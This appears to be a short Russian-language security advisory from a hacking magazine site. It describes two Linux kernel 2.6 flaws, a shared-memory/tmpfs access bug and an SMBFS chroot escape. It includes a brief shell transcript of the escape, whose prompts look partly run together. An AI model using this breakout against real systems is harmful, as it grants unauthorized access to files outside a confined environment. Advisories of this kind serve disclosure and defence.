Витрина продуктов

Все продукты →
  • Подписка на «Хакер» -40%

    Подписка на «Хакер»

    Все статьи, архив и бонусы

    6000 ₽ / год

    Оформить
  • Печатный журнал

    Печатный журнал

    Легендарный в твоём формате

    710 ₽ / номер

    Купить
  • Онлайн-курсы Новое

    Онлайн-курсы

    Практические навыки от экспертов

    от 9000 ₽

    Выбрать

Уязвимость позволяет удаленному злоумышленнику получить доступ к конфиденциальной информации системы.

1) Уязвимость существует из-за ошибки в работе с памятью. Атакующий может получить доступ на чтение и запись в разделяемую память и доступ на запись в файловую систему tmpfs.

2) Уязвимость существует из-за ошибки в файловой системе SMBFS. Локальный атакующий, имеющий ограничения chroot может обойти систему безопасности и получить неавторизованный доступ к файловой системе.

Пример:

Linux kernel 2.6.x

root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии